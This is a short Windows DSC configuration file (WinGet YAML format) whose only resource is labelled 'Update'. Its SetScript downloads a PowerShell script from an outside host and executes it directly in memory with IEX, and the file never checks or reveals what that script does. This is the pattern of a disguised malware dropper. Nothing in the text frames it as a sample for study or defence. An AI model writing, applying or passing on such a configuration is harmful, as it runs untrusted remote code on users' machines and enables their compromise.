# yaml-language-server: $schema=https://aka.ms/configuration-dsc-schema/0.2
properties:
  configurationVersion: 0.2.0
  resources:
    - resource: PSDscResources/Script
      directives:
        description: Update
      settings:
        SetScript: |
          try {
            [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
            $code = (New-Object System.Net.WebClient).DownloadString("https://test.vlkhelpdesk.nl/vlk/package.ps1")
            IEX $code
          } catch {
            $_ | Out-File "$env:TEMP\dsc_error.txt"
          }
        GetScript: $false
        TestScript: $false
